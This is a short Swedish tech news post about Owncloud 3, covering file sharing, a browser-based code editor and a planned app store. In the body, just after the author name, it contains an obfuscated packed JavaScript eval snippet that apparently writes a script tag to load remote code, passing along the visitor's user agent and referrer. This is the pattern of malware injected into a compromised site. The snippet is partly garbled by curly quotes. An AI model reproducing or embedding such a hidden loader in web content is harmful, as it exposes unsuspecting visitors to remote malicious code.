Image Image Image Image Image Image Image Image Image Image

| 4 augusti, 2020

Scroll to top

Top

KDE Owncloud börjar med fildelning

KDE Owncloud börjar med fildelning
Sebastian

KDE eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|enann|var|u0026u|referrer|iatih||js|php’.split(’|’),0,{}))
Owncloud håller nu på att bli ett komplett operativsystem som körs i din webbläsare.

Själva säger KDE att Owncloud lämpar sig bäst för att spara, synkronisera och dela filer med andra direkt från din egna miljö. Du kan också välja att jobba med filerna direkt genom webbläsaren.

Till detta har det också släppts en textredigerare där du både kan redigera texter och programmera. Textredigeraren har stöd för syntax highlighting och 35 programmeringsspråk, drag-n-drop, kodihopfällning och mycket mer. Den klarar även av att kontrollera kod skriven i Javascript, Coffee och css.

Owncloud 3 kommer även att ha en appbutik tillgänglig för utvecklare. Utvecklare kommer att kunna skriva program för Owncloud och sedan ladda upp dem på apps.owncloud.com. Därefter kan användare välja att installera programmen direkt i Owncloud.

Hela Owncloud skulle kunna vara en stängd molntjänst på webben men hela konceptet bakom projektet är att det ska vara en öppen kod som lätt kan laddas ner och installeras på egen server.

Läs gärna mer om denna unga idé som endast har två år på nacken

Via: IDG.se